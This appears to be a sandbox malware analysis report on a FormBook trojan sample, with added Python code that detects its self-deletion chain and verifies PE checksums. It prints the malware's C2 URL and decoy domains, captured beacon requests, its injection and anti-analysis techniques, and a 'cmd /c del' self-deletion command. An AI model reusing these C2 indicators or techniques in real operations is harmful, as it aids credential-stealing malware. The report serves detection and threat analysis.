Windows Analysis Report Y1p8VPvyU2

Overview

General Information

Sample Name: Y1p8VPvyU2 (renamed file extension from none to exe)
Analysis ID: 532909
MD5: 83be105c9fa2427bd6079f5d19659596
SHA1: 1430baa740d2cd40a507cbfa8fe62e3d78424315
SHA256: 8cd6125941710166af38133bce6cae9f9cc41c8d88ff774cd691081d193015a1
Tags: 32, exe, trojan

Detection

Threat: FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Self deletion via cmd delete
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Drops PE files
Contains functionality to read the PEB
Checks if the current process is being debugged
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • Y1p8VPvyU2.exe (PID: 7100 cmdline: "C:\Users\user\Desktop\Y1p8VPvyU2.exe" MD5: 83BE105C9FA2427BD6079F5D19659596)
    • Y1p8VPvyU2.exe (PID: 1304 cmdline: "C:\Users\user\Desktop\Y1p8VPvyU2.exe" MD5: 83BE105C9FA2427BD6079F5D19659596)
      • explorer.exe (PID: 3352 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cscript.exe (PID: 4816 cmdline: C:\Windows\SysWOW64\cscript.exe MD5: 00D3041E47F99E48DD5FFFEDF60F6304)
          • cmd.exe (PID: 3192 cmdline: /c del "C:\Users\user\Desktop\Y1p8VPvyU2.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 2332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
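The tree above records the chain the sandbox saw: the sample, a second copy of itself, an injected explorer.exe, a cscript.exe started with no script argument, and finally cmd.exe /c del removing the original file. As an added example (not part of the Joe Sandbox report), the Python below runs three detections over constructed process-creation events modelled on that tree; the image paths of cmd.exe and conhost.exe and the parent PIDs outside the tree are assumptions, since the report does not list them. Because FormBook reaches explorer.exe and cscript.exe by injection, the recorded parent chain in real telemetry does not lead back to the sample, so the self-deletion rule matches the deleted path against every image executed earlier in the event stream instead of walking ancestors.

```python
import re

# Constructed process-creation events modelled on the report's process tree.
# Assumed (not in the report): the image paths of cmd.exe and conhost.exe, and
# the parent PIDs of the first sample process (4000) and of explorer.exe (900).
EVENTS = [
    {"pid": 7100, "ppid": 4000, "image": r"C:\Users\user\Desktop\Y1p8VPvyU2.exe",
     "cmdline": r'"C:\Users\user\Desktop\Y1p8VPvyU2.exe"'},
    {"pid": 1304, "ppid": 7100, "image": r"C:\Users\user\Desktop\Y1p8VPvyU2.exe",
     "cmdline": r'"C:\Users\user\Desktop\Y1p8VPvyU2.exe"'},
    # explorer.exe is an injection victim; its real parent is not the sample.
    {"pid": 3352, "ppid": 900, "image": r"C:\Windows\Explorer.EXE",
     "cmdline": r"C:\Windows\Explorer.EXE"},
    {"pid": 4816, "ppid": 3352, "image": r"C:\Windows\SysWOW64\cscript.exe",
     "cmdline": r"C:\Windows\SysWOW64\cscript.exe"},
    {"pid": 3192, "ppid": 4816, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r'/c del "C:\Users\user\Desktop\Y1p8VPvyU2.exe"'},
    {"pid": 2332, "ppid": 3192, "image": r"C:\Windows\System32\conhost.exe",
     "cmdline": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"},
]

SCRIPT_HOSTS = {"cscript.exe", "wscript.exe"}
# "del", optional switches such as /f /q, then an optionally quoted path at the end.
DEL_RE = re.compile(r'\bdel\b\s+(?:/\w+\s+)*"?([^"]+?)"?\s*$', re.IGNORECASE)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return (pid, rule_name) tuples for every event that trips a rule."""
    alerts = []
    by_pid = {e["pid"]: e for e in events}
    seen_images = set()  # every image executed so far in the stream, lower-cased
    for e in events:
        image = basename(e["image"])
        parent = by_pid.get(e["ppid"])
        if image in SCRIPT_HOSTS:
            # Rule 1: a script host without a script to run. The command line is
            # assumed to start with the image path, as in the report; anything
            # left after dropping it and the switches would be the script.
            args = [a for a in e["cmdline"].split()[1:] if not a.startswith("/")]
            if not args:
                alerts.append((e["pid"], "script_host_without_script"))
        elif image == "cmd.exe":
            m = DEL_RE.search(e["cmdline"])
            if m:
                target = m.group(1).strip().lower()
                # Rule 2: the deleted file is a binary that ran earlier in this
                # stream, regardless of lineage (injection breaks the parent chain).
                if target in seen_images:
                    alerts.append((e["pid"], "self_deletion_of_executed_binary"))
                # Rule 3: the deleting shell was spawned by a script host.
                if parent and basename(parent["image"]) in SCRIPT_HOSTS:
                    alerts.append((e["pid"], "script_host_spawns_cmd_del"))
        seen_images.add(e["image"].lower())
    return alerts


if __name__ == "__main__":
    for pid, rule in detect(EVENTS):
        print(f"PID {pid}: {rule}")
```

Rule 1 is a heuristic: an interactive user occasionally runs a bare cscript.exe to see its usage text, so it is best combined with rule 3 or with the network activity from a process that should not have any.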

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.tgalegail.quest/n6fr/"], "decoy": ["magnetic-island-qld.com", "yr-golf.com", "udyam-registration.com", "paulsamaco.com", "mimisminiatureboutique.store", "csspadding.com", "gujaratigyaan.com", "findphotographersonline.com", "clevelawareness.com", "purelyhawaii.com", "2axx.com", "tricktodance.com", "getstoic.com", "globexglobalstore.com", "mysticnail.net", "handejqr.com", "letswatch.online", "lnfddttoyof6.xyz", "tdc-trust.com", "federalimmigrationgola.com", "cinasing.com", "614721.com", "pumpizy.com", "satsumauosen-official.com", "fairytalesinc.com", "fastbest.host", "assisttm.com", "triniautotrader.com", "alissanoume.xyz", "ma-manger.com", "twinpick.paris", "easycv4u.com", "xn--2i0bm4p1b62jv8dxz3b7uj.com", "ventleetailoronline.com", "8355512.win", "catlyfoundation.com", "mygeorgecolemanfordstory.com", "haiphongmap.com", "canvasb.net", "salvationhubtv.com", "teamisenberg.com", "innoclubs.com", "glwcn.net", "byshelly.biz", "commongroundcowork.com", "zhonglucredit.com", "tyjgfuke.com", "caixadepandora.club", "webuywholesalerhouses.com", "hundvardag.com", "nchh02.xyz", "oqnr.top", "rapidfreecredit.com", "alquilarorihuela.com", "medicijnenshop.com", "somoslaostra.com", "luvvlyjubblyshop.com", "housestephenson.com", "39abxx.com", "gsjbd1.club", "luisantonioenedina.com", "xn--pckwb0cye6947ajzku8opzi.com", "jakihmentha.quest", "clothingteesshop.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000001.00000001.304934739.0000000000400000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000001.00000001.304934739.0000000000400000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000001.304934739.0000000000400000.00000040.00020000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x16ad9:$sqlite3step: 68 34 1C 7B E1
  • 0x16bec:$sqlite3step: 68 34 1C 7B E1
  • 0x16b08:$sqlite3text: 68 38 2A 90 C5
  • 0x16c2d:$sqlite3text: 68 38 2A 90 C5
  • 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
00000001.00000000.304424908.0000000000400000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000001.00000000.304424908.0000000000400000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(28 entries in total; the remaining entries are not reproduced here)

      Unpacked PEs

Source | Rule | Description | Author | Strings
0.2.Y1p8VPvyU2.exe.2420000.1.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0.2.Y1p8VPvyU2.exe.2420000.1.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x7ba2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x138b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x133a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x139b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x13b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x85ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1261c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9332:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x18da7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x19e4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0.2.Y1p8VPvyU2.exe.2420000.1.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x15cd9:$sqlite3step: 68 34 1C 7B E1
  • 0x15dec:$sqlite3step: 68 34 1C 7B E1
  • 0x15d08:$sqlite3text: 68 38 2A 90 C5
  • 0x15e2d:$sqlite3text: 68 38 2A 90 C5
  • 0x15d1b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x15e43:$sqlite3blob: 68 53 D8 7F 8C
1.0.Y1p8VPvyU2.exe.400000.4.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
1.0.Y1p8VPvyU2.exe.400000.4.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x7ba2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x138b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x133a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x139b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x13b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x85ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1261c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9332:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x18da7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x19e4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(28 entries in total; the remaining entries are not reproduced here)

          Sigma Overview

          No Sigma rule has matched

          Jbx Signature Overview

          AV Detection:

Found malware configuration
Source: 00000001.00000001.304934739.0000000000400000.00000040.00020000.sdmp | Malware Configuration Extractor: FormBook (the same configuration as shown under Malware Configuration above)
Multi AV Scanner detection for submitted file
Source: Y1p8VPvyU2.exe | Virustotal: Detection: 35%
Source: Y1p8VPvyU2.exe | ReversingLabs: Detection: 64%
Yara detected FormBook
Source: Yara match | File source: 0.2.Y1p8VPvyU2.exe.2420000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.Y1p8VPvyU2.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.Y1p8VPvyU2.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Y1p8VPvyU2.exe.2420000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.1.Y1p8VPvyU2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.Y1p8VPvyU2.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.Y1p8VPvyU2.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.Y1p8VPvyU2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.1.Y1p8VPvyU2.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.Y1p8VPvyU2.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.Y1p8VPvyU2.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000001.00000001.304934739.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000000.304424908.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000000.303509344.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.565875481.0000000001220000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.567386686.00000000038B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.361567881.0000000000670000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.361497642.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.361714769.00000000009E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.566653867.0000000003440000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000000.336290310.0000000010086000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.305776988.0000000002420000.00000004.00000001.sdmp, type: MEMORY
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\nsj1052.tmp\msvofdls.dll | ReversingLabs: Detection: 50%
Source: 1.0.Y1p8VPvyU2.exe.400000.4.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 0.2.Y1p8VPvyU2.exe.2420000.1.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.0.Y1p8VPvyU2.exe.400000.1.unpack | Avira: Label: TR/Patched.Ren.Gen2
Source: 6.2.cscript.exe.592796c.4.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 1.1.Y1p8VPvyU2.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.0.Y1p8VPvyU2.exe.400000.3.unpack | Avira: Label: TR/Patched.Ren.Gen2
Source: 1.0.Y1p8VPvyU2.exe.400000.5.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.2.Y1p8VPvyU2.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.0.Y1p8VPvyU2.exe.400000.2.unpack | Avira: Label: TR/Patched.Ren.Gen2
Source: 1.0.Y1p8VPvyU2.exe.400000.0.unpack | Avira: Label: TR/Patched.Ren.Gen2
Source: 6.2.cscript.exe.35c8670.1.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 1.0.Y1p8VPvyU2.exe.400000.6.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: Y1p8VPvyU2.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: Binary string: cscript.pdbUGP | source: Y1p8VPvyU2.exe, 00000001.00000002.361796022.0000000000A60000.00000040.00020000.sdmp
Source: Binary string: wntdll.pdbUGP | source: Y1p8VPvyU2.exe, 00000000.00000003.303889590.0000000002C00000.00000004.00000001.sdmp, Y1p8VPvyU2.exe, 00000000.00000003.304490729.0000000002A70000.00000004.00000001.sdmp, Y1p8VPvyU2.exe, 00000001.00000002.361845075.0000000000AE0000.00000040.00000001.sdmp, Y1p8VPvyU2.exe, 00000001.00000002.362000992.0000000000BFF000.00000040.00000001.sdmp, cscript.exe, 00000006.00000002.568376162.000000000550F000.00000040.00000001.sdmp, cscript.exe, 00000006.00000002.567946255.00000000053F0000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb | source: Y1p8VPvyU2.exe, Y1p8VPvyU2.exe, 00000001.00000002.361845075.0000000000AE0000.00000040.00000001.sdmp, Y1p8VPvyU2.exe, 00000001.00000002.362000992.0000000000BFF000.00000040.00000001.sdmp, cscript.exe, cscript.exe, 00000006.00000002.568376162.000000000550F000.00000040.00000001.sdmp, cscript.exe, 00000006.00000002.567946255.00000000053F0000.00000040.00000001.sdmp
Source: Binary string: cscript.pdb | source: Y1p8VPvyU2.exe, 00000001.00000002.361796022.0000000000A60000.00000040.00020000.sdmp
Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe | Code function: 0_2_00405250 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe | Code function: 0_2_00405C22 FindFirstFileA,FindClose,
Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe | Code function: 0_2_00402630 FindFirstFileA,
Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe | Code function: 4x nop then pop edi
Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe | Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 4x nop then pop edi
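Two static findings in this report, "PE file contains an invalid checksum" in the signature list and the Static PE information line for Y1p8VPvyU2.exe above, refer to the CheckSum field of the PE optional header. The Python below is an added example, not part of the report or of Joe Sandbox: it implements the standard PE checksum (a 16-bit ones'-complement sum over the whole file with the CheckSum dword skipped, plus the file length) and applies it to a constructed, minimal PE32 header buffer, because the report does not supply the sample bytes. A stated value of zero is reported separately from a wrong one: zero means the field was never filled in, which is common in unsigned builds, whereas a non-zero value that fails to verify means the bytes no longer match what the header claims, which is the stronger signal of post-build patching.

```python
def checksum_field_offset(data: bytes) -> int:
    """Locate IMAGE_OPTIONAL_HEADER.CheckSum (offset 64 in both PE32 and PE32+)."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = int.from_bytes(data[0x3C:0x40], "little")
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    optional_header = e_lfanew + 4 + 20  # skip the PE signature and the COFF file header
    magic = int.from_bytes(data[optional_header:optional_header + 2], "little")
    if magic not in (0x10B, 0x20B):
        raise ValueError(f"unexpected optional header magic {magic:#x}")
    return optional_header + 64


def compute_pe_checksum(data: bytes, csum_off: int) -> int:
    """Standard PE checksum: ones'-complement sum of 16-bit words, CheckSum dword excluded, plus length."""
    total = 0
    n = len(data)
    for i in range(0, n - 1, 2):
        if csum_off <= i < csum_off + 4:  # skip both words of the CheckSum field
            continue
        total += int.from_bytes(data[i:i + 2], "little")
        total = (total & 0xFFFF) + (total >> 16)  # fold the carry back in
    if n & 1:  # odd trailing byte
        total += data[-1]
        total = (total & 0xFFFF) + (total >> 16)
    total = (total & 0xFFFF) + (total >> 16)
    return (total & 0xFFFF) + n


def checksum_status(data: bytes) -> str:
    """'unset' (field is zero), 'valid' (matches) or 'invalid' (non-zero and wrong)."""
    off = checksum_field_offset(data)
    stated = int.from_bytes(data[off:off + 4], "little")
    if stated == 0:
        return "unset"
    return "valid" if stated == compute_pe_checksum(data, off) else "invalid"


def build_minimal_pe(stated_checksum: int) -> bytes:
    """Constructed PE32 header skeleton (not loadable) carrying the given CheckSum value."""
    buf = bytearray(0x200)
    e_lfanew = 0x80
    buf[0:2] = b"MZ"
    buf[0x3C:0x40] = e_lfanew.to_bytes(4, "little")
    buf[e_lfanew:e_lfanew + 4] = b"PE\0\0"
    coff = e_lfanew + 4
    buf[coff:coff + 2] = (0x14C).to_bytes(2, "little")          # Machine = IMAGE_FILE_MACHINE_I386
    buf[coff + 16:coff + 18] = (0xE0).to_bytes(2, "little")     # SizeOfOptionalHeader for PE32
    buf[coff + 18:coff + 20] = (0x0102).to_bytes(2, "little")   # EXECUTABLE_IMAGE | 32BIT_MACHINE
    opt = coff + 20
    buf[opt:opt + 2] = (0x10B).to_bytes(2, "little")            # PE32 magic
    buf[opt + 64:opt + 68] = stated_checksum.to_bytes(4, "little")
    return bytes(buf)


if __name__ == "__main__":
    unset = build_minimal_pe(0)
    good = compute_pe_checksum(unset, checksum_field_offset(unset))
    for label, pe in (("zeroed", unset),
                      ("correct", build_minimal_pe(good)),
                      ("tampered", build_minimal_pe(good ^ 0x1))):
        print(f"{label}: status={checksum_status(pe)}")
```

On a real file, read it fully into memory and call checksum_status on the bytes; the computation is the same one the Windows loader applies to drivers and to images it verifies.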

          Networking:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe | Domain query: www.assisttm.com
Source: C:\Windows\explorer.exe | Domain query: www.gsjbd1.club
Source: C:\Windows\explorer.exe | Network Connect: 23.110.214.34 80
Source: C:\Windows\explorer.exe | Network Connect: 45.8.125.8 80
Source: C:\Windows\explorer.exe | Domain query: www.tyjgfuke.com
Source: C:\Windows\explorer.exe | Network Connect: 34.102.136.180 80
Source: C:\Windows\explorer.exe | Domain query: www.yr-golf.com
Source: C:\Windows\explorer.exe | Domain query: www.fastbest.host
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: www.tgalegail.quest/n6fr/
Source: Joe Sandbox View | ASN Name: LEASEWEB-USA-LAX-11US
Source: Joe Sandbox View | ASN Name: SELECTELRU
Source: global traffic | HTTP traffic detected: GET /n6fr/?W0Gd5=_zrxFrQh&r8Yhe8X=BQDMjsZC/MHMhOokLNCZ8NvLdfoNcIlcbjuvjCJyzVYcZRVM3RE3M6YlVSnQ+pY87GBB HTTP/1.1 | Host: www.yr-golf.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected: GET /n6fr/?r8Yhe8X=GhRWdiRsNNJH8eQL+yxTqcpdK2zUc5yAzRv8ilcs8c/60sXMgS13/r7ilAGjTWuYzon7&W0Gd5=_zrxFrQh HTTP/1.1 | Host: www.assisttm.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected: GET /n6fr/?W0Gd5=_zrxFrQh&r8Yhe8X=RitrxMT4CF2430UT8yTHljH4YcWCFGycH+KnQUedz6G1CLl+fZ1eccWunXIbAos2Mzom HTTP/1.1 | Host: www.fastbest.host | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: openresty | Date: Thu, 02 Dec 2021 19:00:36 GMT | Content-Type: text/html | Content-Length: 275 | ETag: "61973ffe-113" | Via: 1.1 google | Connection: close | Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: openresty | Date: Thu, 02 Dec 2021 19:00:41 GMT | Content-Type: text/html | Content-Length: 275 | ETag: "61a4f026-113" | Via: 1.1 google | Connection: close | Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Thu, 02 Dec 2021 19:01:18 GMT | Content-Type: text/html; charset=UTF-8 | Content-Length: 7081 | Connection: close | Last-Modified: Mon, 27 Sep 2021 00:52:07 GMT | ETag: "1ba9-5ccef81a2c93b" | Data Ascii (decoded from the captured hex; the capture ends partway through the 7081-byte body): <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="description" content> <title>fastbest - Хостинг для каждого </title> (Russian: "Hosting for everyone") <link rel="icon" type="image/png" href="sqUImDCVKAs7.ico"> <link href="https://fonts.googleapis.com/css2?family=Open+Sans:wght@300;400;600;700;800&amp;display=swap" rel="stylesheet"> <link rel="preconnect" href="https://fonts.gstatic.com"> <link href="https://fonts.googleapis.com/css2?family=Josefin+Sans:wght@400;500;600;700&amp;display=swap" rel="stylesheet"> <link rel="stylesheet" href="css/QDT8YfN0BFcM.css"> <link rel="stylesheet" href="css/hKfqNjwXPSze.css"> <link rel="stylesheet" href="css/atTcsRJOLoMl.css"> <link rel="stylesheet" href="css/ohOqlw8pl9nh.css"> <link rel="stylesheet" href="css/LCP6ruLpMHZX.css"> <link ... (truncated)
Source: Y1p8VPvyU2.exe | String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: Y1p8VPvyU2.exe | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: cscript.exe, 00000006.00000002.567221825.0000000003647000.00000004.00000020.sdmp | String found in binary or memory: http://www.tyjgfuke.com/$t
Source: cscript.exe, 00000006.00000002.567221825.0000000003647000.00000004.00000020.sdmp | String found in binary or memory: http://www.tyjgfuke.com/n6fr/?r8Yhe8X=LSrsi9BeeNNPJfOX4A9nLsTLbEdx4M4dJGVYJBt
Source: cscript.exe, 00000006.00000002.568909569.0000000005AA2000.00000004.00020000.sdmp | String found in binary or memory: https://browsehappy.com/
Source: cscript.exe, 00000006.00000002.568909569.0000000005AA2000.00000004.00020000.sdmp | String found in binary or memory: https://fastbest.host
Source: cscript.exe, 00000006.00000002.568909569.0000000005AA2000.00000004.00020000.sdmp | String found in binary or memory: https://fonts.googleapis.com/css2?family=Josefin
Source: cscript.exe, 00000006.00000002.568909569.0000000005AA2000.00000004.00020000.sdmp | String found in binary or memory: https://fonts.googleapis.com/css2?family=Open
Source: cscript.exe, 00000006.00000002.568909569.0000000005AA2000.00000004.00020000.sdmp | String found in binary or memory: https://fonts.gstatic.com
Source: cscript.exe, 00000006.00000002.568909569.0000000005AA2000.00000004.00020000.sdmp | String found in binary or memory: https://via.placeholder.com/100
Source: unknown | DNS traffic detected: queries for: www.yr-golf.com
Source: Y1p8VPvyU2.exe, 00000000.00000002.305416904.00000000006FA000.00000004.00000020.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
